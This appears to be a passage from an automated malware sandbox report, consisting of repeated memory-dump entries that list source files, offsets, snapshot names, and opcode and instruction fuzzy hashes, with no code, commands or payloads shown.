                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82268a138d37e13027f4f70874f6d0c7fb232f91c7387845747917e03e773a58
                                          • Instruction ID: 7eacde062469ac8b9219237de8666eb1e4be909abe4d4fd8b681bc5d1c8fb6e1
                                          • Opcode Fuzzy Hash: 82268a138d37e13027f4f70874f6d0c7fb232f91c7387845747917e03e773a58
                                          • Instruction Fuzzy Hash: 88F0E774900118CFEB54DF6DE495BAC7BB2FB45704F1084A9E149A3245DB356E84CF35
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23d04dfefed1dc39965376193cc790ca521a92b6c045c2d5e4bd8196d598cb4c
                                          • Instruction ID: 86cc7e02559ebf256c3659abd773bfbb5a27292da1826c6fac0307364d46057b
                                          • Opcode Fuzzy Hash: 23d04dfefed1dc39965376193cc790ca521a92b6c045c2d5e4bd8196d598cb4c
                                          • Instruction Fuzzy Hash: 02F06571E08218AFCF09CF98D4486DDBFB7DB44316F1880A9D109D7654DB705A81C794
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e637a91cc9d5f94cb116504ac7d80da81ea98a6d85d2ca3280c12e4e7a88d93c
                                          • Instruction ID: 3840972fc437c56f0a6fe887535fbb443a4a1358e53a0ac4d594f4bbd8c6a708
                                          • Opcode Fuzzy Hash: e637a91cc9d5f94cb116504ac7d80da81ea98a6d85d2ca3280c12e4e7a88d93c
                                          • Instruction Fuzzy Hash: 67E092B298B248AECBC6DFB44C145DD7FB89F53200B1541EAD005E7652ED354A05EB22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f015175eba060a3ac5da0e008fad4e9cabe9a4c5f7440705ca428cc2721a1902
                                          • Instruction ID: ae651b8916638b31bdb338ac05ed83346b09234b19a2c4530db753eeea8dea7f
                                          • Opcode Fuzzy Hash: f015175eba060a3ac5da0e008fad4e9cabe9a4c5f7440705ca428cc2721a1902
                                          • Instruction Fuzzy Hash: 3FF0FF74904218DFDB50DFADD49979CBBB2FB45310F1040AAE609A7745C7345D84CF20
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d7339646bf3d18f47ec54ca476e44cf61cad8098b60f7ce6e23667aa4c6005a
                                          • Instruction ID: e2b48d7da317e4da674e44dd0b3117dd7db0fd8172579936b643bcbf5e7bf946
                                          • Opcode Fuzzy Hash: 5d7339646bf3d18f47ec54ca476e44cf61cad8098b60f7ce6e23667aa4c6005a
                                          • Instruction Fuzzy Hash: 86E012313042055BC7149A1AF988C4BFB9EEEC02647108539E10A87529DAB4ED49C7A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cae201c38a0dad82d1f54601e1ff45580794e9eebe31be6b122e9eb6225e57a7
                                          • Instruction ID: d8849590dd13b79fd570ce2e4469eef6ada6ba5dc94cf451f3329f253204d220
                                          • Opcode Fuzzy Hash: cae201c38a0dad82d1f54601e1ff45580794e9eebe31be6b122e9eb6225e57a7
                                          • Instruction Fuzzy Hash: 7AE0487450D144AFC742DF94C8519A5BFF8DB47210B1494DAD84497253C6369E06DFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 147072b0141b7bac874f08359a7230b23610eb4aae8272404c24eccd0b0439b5
                                          • Instruction ID: 926d6a68323b6e86ba76a5719b246d8c22177435bb580693383e9de7be19a5ab
                                          • Opcode Fuzzy Hash: 147072b0141b7bac874f08359a7230b23610eb4aae8272404c24eccd0b0439b5
                                          • Instruction Fuzzy Hash: 7EE09270446348AFC742DBB488145AEBFFDDB46221B1085E6D006DB562DA355A10DBA3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 322cef7d88e349c344c41510e53eb223c26f7b903ad2e83ffb9092a003e922f9
                                          • Instruction ID: 5d8386bd352cf264b7e606c62da51c0570c8b2f8296e74f8de345338b11e1f8b
                                          • Opcode Fuzzy Hash: 322cef7d88e349c344c41510e53eb223c26f7b903ad2e83ffb9092a003e922f9
                                          • Instruction Fuzzy Hash: 4AF0F874D05208EFCB81DFA9D941A9DFBF5EB48310F10C5AAA81897305D631AE11DF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 31384d83c28f47eb6c3fcede3363a7be57423f666116c5c707d9ac6615e0ca53
                                          • Instruction ID: d91dfed6c574a5d34fe98ddcbefd5cce2d9517f02bd0094cedc8e388f6c5dce7
                                          • Opcode Fuzzy Hash: 31384d83c28f47eb6c3fcede3363a7be57423f666116c5c707d9ac6615e0ca53
                                          • Instruction Fuzzy Hash: D1E0927491E244DFCF06CFA4D8405EDBFB0EB46211F14C1DAD84497352C6324E16DBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f626ee240597bdab7cfedcb4a7167c8390755f19a8641fe7d3c24889d69adb8
                                          • Instruction ID: 7bac4bd06ded791423ea6c73762f172840d792d672f56a7878490e69efb04140
                                          • Opcode Fuzzy Hash: 4f626ee240597bdab7cfedcb4a7167c8390755f19a8641fe7d3c24889d69adb8
                                          • Instruction Fuzzy Hash: BCE09270A59388AFC742DB789D11A5E7FB9EB83300F1580DAE409DB252E9315F01E7B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ffd86b36c63a372b664f0793f41c3b48775907a76e1ee9159b203177875464d2
                                          • Instruction ID: c4f7a6c1f6cac43ec8d1ab34a55213b6f3d7b77b720cc4cef0ec3458278d3781
                                          • Opcode Fuzzy Hash: ffd86b36c63a372b664f0793f41c3b48775907a76e1ee9159b203177875464d2
                                          • Instruction Fuzzy Hash: F6F0A578D05208EFCB85DFA9D941A9DBBF5EB48710F20C0AAA818A3351D6369E51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fec7838c73799cf795dbc050cc50d34ec4fce1f759a539bb38866cbb20e10ab2
                                          • Instruction ID: f15e0f467b4cdd1e88d059626170af81d162bf4374cf4edb1830379d95847f38
                                          • Opcode Fuzzy Hash: fec7838c73799cf795dbc050cc50d34ec4fce1f759a539bb38866cbb20e10ab2
                                          • Instruction Fuzzy Hash: 72E0D875846208DECB81EFB8C90455D7FFCDF86210F1081EAD500D7611EE368900C7A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3059b42bfc3fbfba58033694faeaedc8b05ea69bff749a44607ad2fa51f4d5ae
                                          • Instruction ID: 8129488b6acca07cffb8980fb145a86455a26c7d19ac93f22c3a51a1dc4a82dc
                                          • Opcode Fuzzy Hash: 3059b42bfc3fbfba58033694faeaedc8b05ea69bff749a44607ad2fa51f4d5ae
                                          • Instruction Fuzzy Hash: 64E0923064A34AEFC701DFB4ED1198EBFA9DF82300B1441AAE408C7286DA355F15D7A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ee94f20133919a8e8cd4bd1dd9629ea097ba512de2dc23a33d716fac09b98a7
                                          • Instruction ID: e1871b04b15c6e120d5c3ce3078cbfd1e4f1d27b4501bd7a7790dd8de01e13e8
                                          • Opcode Fuzzy Hash: 3ee94f20133919a8e8cd4bd1dd9629ea097ba512de2dc23a33d716fac09b98a7
                                          • Instruction Fuzzy Hash: E2E05AB2A4F3C02FD38797208D2588A7F719EA3200B0E54D7D084CB0A7D2284A18C3A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c422ebe5f11b2e52c781dd5b460faf52e1caa58acf703c43d045d9cb001138d6
                                          • Instruction ID: 64a9b76b9747fbf97a31de23aa932d29c615d81cb9adcc49675a7cf5d100a229
                                          • Opcode Fuzzy Hash: c422ebe5f11b2e52c781dd5b460faf52e1caa58acf703c43d045d9cb001138d6
                                          • Instruction Fuzzy Hash: 91E0CD307503055BEBD0A7755D00B6273DADF45759F580469D6075FBD0DD61DC01C3A5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d44e38b05fc6c83e71c968b05534634984a57e9ec05c7cb3f93a317bc5213a2
                                          • Instruction ID: 9b9d7b36cd00e47e6012640e4e893940547dbd1e8420dc296dd2dde736c793af
                                          • Opcode Fuzzy Hash: 4d44e38b05fc6c83e71c968b05534634984a57e9ec05c7cb3f93a317bc5213a2
                                          • Instruction Fuzzy Hash: B8E0EDB4D04208EFCB94DFA8D44069DFBF4FB49314F10C0AA980993341DA759A51DF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d44e38b05fc6c83e71c968b05534634984a57e9ec05c7cb3f93a317bc5213a2
                                          • Instruction ID: ffa9b47b04832adc9077e95f36c790563b5324ae0331cca2113ebff2c4112eb8
                                          • Opcode Fuzzy Hash: 4d44e38b05fc6c83e71c968b05534634984a57e9ec05c7cb3f93a317bc5213a2
                                          • Instruction Fuzzy Hash: 0FE0ED74D04208EFCB84DFA9D54069DFBF4FB48311F10C1AA980897341DA369A51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d44e38b05fc6c83e71c968b05534634984a57e9ec05c7cb3f93a317bc5213a2
                                          • Instruction ID: 763068f1a94c348d7bb761fff5ca458d6198512d09962305d519a6190398d13a
                                          • Opcode Fuzzy Hash: 4d44e38b05fc6c83e71c968b05534634984a57e9ec05c7cb3f93a317bc5213a2
                                          • Instruction Fuzzy Hash: 53E0EDB4D44208EFCB94DFA8D54469DFBF5FB48310F10C0AA980893345D6759A51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da49359a2e096d860fe1e83557548639453d9394370ef68bb215bd8d3f391933
                                          • Instruction ID: 93a4c56e59625a2161c9c279b7606c7bef55b16ab9ae6b86ac228d3c1bb9dd8f
                                          • Opcode Fuzzy Hash: da49359a2e096d860fe1e83557548639453d9394370ef68bb215bd8d3f391933
                                          • Instruction Fuzzy Hash: DCF07474A052089FEB50DF5CE98479EBBF2FB45305F1481A9D10DA3658DB38A9858F20
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f091169032209401425ba27581ec640233b2b67e4440afcf7ba6e6e051d77b8d
                                          • Instruction ID: 9713662a09beecfe1e56e134466f547787b67e68c382278b3d600cafbc72e696
                                          • Opcode Fuzzy Hash: f091169032209401425ba27581ec640233b2b67e4440afcf7ba6e6e051d77b8d
                                          • Instruction Fuzzy Hash: A9E0E574E04208EFCB84DFACD8406ACBBF8EB88314F10C4AA9818A3341DA359E01CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f091169032209401425ba27581ec640233b2b67e4440afcf7ba6e6e051d77b8d
                                          • Instruction ID: 15ed546fb5809a2f7d8e000e9f079a3cad16086af5e318631509a802169d5c19
                                          • Opcode Fuzzy Hash: f091169032209401425ba27581ec640233b2b67e4440afcf7ba6e6e051d77b8d
                                          • Instruction Fuzzy Hash: FCE0E5B4E05208EFCB84DFA9D4416ADFBF4EB88310F10C0AA981893345DA35AE41CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d138ec3ecb940bcb4faa768c3d18e6731ad092cf9a1a4ffa69aca3e4374d6fc4
                                          • Instruction ID: 178f8b9ace01fcfefa7db1e022da0a8660d0f7cf171a7ccc44c688cb0452a8b1
                                          • Opcode Fuzzy Hash: d138ec3ecb940bcb4faa768c3d18e6731ad092cf9a1a4ffa69aca3e4374d6fc4
                                          • Instruction Fuzzy Hash: 47E0ED74E44208EFCB84DFA8D44469CBBF4EB48314F50C0A9980893341DA359A02CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d138ec3ecb940bcb4faa768c3d18e6731ad092cf9a1a4ffa69aca3e4374d6fc4
                                          • Instruction ID: 3a28051dbac76b0ea7a482989ae70fb5cfbaa07bc12defac2b3f3dc22016fff2
                                          • Opcode Fuzzy Hash: d138ec3ecb940bcb4faa768c3d18e6731ad092cf9a1a4ffa69aca3e4374d6fc4
                                          • Instruction Fuzzy Hash: 5FE0ED74D04208EFCB84DFA8D44169DBBF4EB48314F10C0A99818A3341D6359A01CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f34c2e741e7c1826abfafb40005d6c9ae9131065a7a8971ff627fe80806ae285
                                          • Instruction ID: 6ff487ffae1177120c3e9a631ba044499d47ffad288716a2238221a34a5358d8
                                          • Opcode Fuzzy Hash: f34c2e741e7c1826abfafb40005d6c9ae9131065a7a8971ff627fe80806ae285
                                          • Instruction Fuzzy Hash: 27E026367040056F8F40DE6CE4004DEBB62EB893107444026FA05C3246C6305A1BD7E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2d7f4280e9492bff4ee9fad743b002eb76bd89b294227fae9c5c4d3d697b0d3
                                          • Instruction ID: b8eadc221bb7cb4c419057099c28ef647be732dd7a88f32c7ca59b13316f8beb
                                          • Opcode Fuzzy Hash: b2d7f4280e9492bff4ee9fad743b002eb76bd89b294227fae9c5c4d3d697b0d3
                                          • Instruction Fuzzy Hash: 58E012B4D05208EFCB84EFA8D4402ACBBF8EB49300F10C4EAD808A3740E6359A40CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 872a4e2880ec8382264ce59d25bc07884b069f1c228212500f44702a6347939f
                                          • Instruction ID: c9ca869c99428012a89543adbf37fc13e86d6f8d17a7828a58192a12d436cc77
                                          • Opcode Fuzzy Hash: 872a4e2880ec8382264ce59d25bc07884b069f1c228212500f44702a6347939f
                                          • Instruction Fuzzy Hash: F2E086B8904208EFCF04DF94D4419ADBBF8EB45320F50C0A9DC0817341D6329E51EB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7810bfb7a325f92ba52ca7533e2de6c1e64b9f498902e6a619fe0c75692201c4
                                          • Instruction ID: c4dd6e262f8b6160f2169c0d570fc2eda88dc5518150286bec13cb582e3e57a5
                                          • Opcode Fuzzy Hash: 7810bfb7a325f92ba52ca7533e2de6c1e64b9f498902e6a619fe0c75692201c4
                                          • Instruction Fuzzy Hash: 3DE086B4D04108DFCB80DFACC44469CBBF4EB48215F2084A99808D3741D6369E41DB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07034714f8a20dfc6c95eafe0f00c489b156f472a9d2c32b6ba799dd3fb48afc
                                          • Instruction ID: 3248d91fb428ebf354c7254a117c48528e539a4458b953f995d5238c137973ae
                                          • Opcode Fuzzy Hash: 07034714f8a20dfc6c95eafe0f00c489b156f472a9d2c32b6ba799dd3fb48afc
                                          • Instruction Fuzzy Hash: DAE06D74A0021C8FE764AF5CE45979E7B72FB98310F004199E30A67396CB789E858F65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 820578e6b2421be9fe039c1047b0ccc79df52ed8b5bb573764a09d32cb2ae584
                                          • Instruction ID: c46ccad111baf4495435452b37e156d9011d941ff17c798896829fae78630f57
                                          • Opcode Fuzzy Hash: 820578e6b2421be9fe039c1047b0ccc79df52ed8b5bb573764a09d32cb2ae584
                                          • Instruction Fuzzy Hash: 97F01C74904118CFEB50EF78D841B8DBBB2EB85714F00819B9A0DB3345DA34AD85CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56ec8c1218b8ab1d33772d88a6a607dd2e3d18dbf78fcae3d5364382864aa1a0
                                          • Instruction ID: 1fc31939e7b80e0efe2ff69e06dba939e2f83783642497cff0cd53bcf70ee841
                                          • Opcode Fuzzy Hash: 56ec8c1218b8ab1d33772d88a6a607dd2e3d18dbf78fcae3d5364382864aa1a0
                                          • Instruction Fuzzy Hash: 56F0F874E02629CFEF61DF29E888B8DBBB1BB09315F1090D5C409A2640D3385F80CF62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e88f5821bfece2ac2d375feee9271906189d3c52aceccbbaa36e0ab4348ab77
                                          • Instruction ID: 63cdea156aac9607eb32dd2438fe9bc6af636b0771249e5a99f8d8365de36c1d
                                          • Opcode Fuzzy Hash: 2e88f5821bfece2ac2d375feee9271906189d3c52aceccbbaa36e0ab4348ab77
                                          • Instruction Fuzzy Hash: E6E0C2639191844FDB6A876C69E18A13B68DE2324070502C9E4499BA29E119990BD3A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9222dae455065b2396b885f21f8e0c84552bafb1650e0902a4d7bf3fff0da035
                                          • Instruction ID: 7d1d60bdb30b0edea24de22596f9bd5382234e934a608ee7fc005a98f3b12e4c
                                          • Opcode Fuzzy Hash: 9222dae455065b2396b885f21f8e0c84552bafb1650e0902a4d7bf3fff0da035
                                          • Instruction Fuzzy Hash: BAE01A74D04208AFCB44EFA9D4506ACBBF4EB88215F10C0AA980853341CA359A01DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9222dae455065b2396b885f21f8e0c84552bafb1650e0902a4d7bf3fff0da035
                                          • Instruction ID: 82a003307a36dfbdd8ea77ea97aa3ed03028f387b4daf5700ff631540dc2a2c0
                                          • Opcode Fuzzy Hash: 9222dae455065b2396b885f21f8e0c84552bafb1650e0902a4d7bf3fff0da035
                                          • Instruction Fuzzy Hash: 5FE01A74D05208AFCB44DFA8D4406ADBBF8EB88214F10C0AA980853341CA359A41DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e2c55c9d74def8fbb6f709f197d11bbd83811826e28fd7e13995552921dae7d
                                          • Instruction ID: 60c00dc929aa368abe98749abdbe480009cfab37710cca732e7e68f595715e9d
                                          • Opcode Fuzzy Hash: 6e2c55c9d74def8fbb6f709f197d11bbd83811826e28fd7e13995552921dae7d
                                          • Instruction Fuzzy Hash: 86D05E3404A3C4AFC3028B60DD05C877F79DB5626431B40C6F1448B273CA229954C7A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f572083254b7cc3c48c87192007f5ba5a97c0b21b3235cb3d2a2af52c017feb6
                                          • Instruction ID: e221365c1088608690fe5541251170131ceb985a04707f18d4f89c6424dd6639
                                          • Opcode Fuzzy Hash: f572083254b7cc3c48c87192007f5ba5a97c0b21b3235cb3d2a2af52c017feb6
                                          • Instruction Fuzzy Hash: 4AE0C27184120CDFC781EFF8C8046AEBBFDEB4A211F1085E59106A3150EE354A00DBA3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0204273f6e3511e689e0428c7a155c542eafab30538bb313b34efd482434648
                                          • Instruction ID: 8863de79e8f2f11b61ea21a2bccd2e6d2dc9f8438ffd787cb8b5e61ee86f8ef9
                                          • Opcode Fuzzy Hash: a0204273f6e3511e689e0428c7a155c542eafab30538bb313b34efd482434648
                                          • Instruction Fuzzy Hash: D6E0C274909108DFCF04DFA4D4405ADBBB8EB85310F20C0A9C80863341CB329E12DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e43b4c16eac58769f400f40b00b5b1f7bce3a64c7187e2f09ccb208fd634d777
                                          • Instruction ID: 5aaf281561d39c814a35b3141fbf918092446b385fce2c62d984489f918ab6d5
                                          • Opcode Fuzzy Hash: e43b4c16eac58769f400f40b00b5b1f7bce3a64c7187e2f09ccb208fd634d777
                                          • Instruction Fuzzy Hash: A4E0C27184210CEFCBC1EBF8890059E77FCDB45210F1080E59500A3210ED364A00DBA2
                                          Memory Dump Source
